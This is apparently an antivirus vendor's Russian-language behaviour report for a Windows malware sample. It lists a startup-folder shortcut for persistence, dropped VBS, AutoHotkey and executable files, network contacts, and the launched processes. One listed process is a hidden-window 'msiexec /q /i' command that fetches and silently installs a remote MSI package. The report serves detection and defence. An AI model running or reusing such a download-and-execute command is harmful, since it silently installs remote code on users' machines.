Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\autotask.lnk
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\EG.vbs
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\eg.vbs
- %ALLUSERSPROFILE%\xeartabas\msi.ahk
- %ALLUSERSPROFILE%\xeartabas\msi.exe
- %ALLUSERSPROFILE%\adb.exe
- %ALLUSERSPROFILE%\adb.ahk
Сетевая активность
TCP
Запросы HTTP GET
- http://46.##.98.190/2402655936-mt1
UDP
- DNS ASK di####leverage.org
Другое
Создает и запускает на исполнение
- '%ALLUSERSPROFILE%\xeartabas\msi.exe'
- '<SYSTEM32>\cmd.exe' /c msiexec /q /i https://divineleverage.org/004.msi' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\EG.vbs' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c msiexec /q /i https://divineleverage.org/004.msi
- '<SYSTEM32>\msiexec.exe' /q /i https://divineleverage.org/004.msi
- '%ALLUSERSPROFILE%\adb.exe'
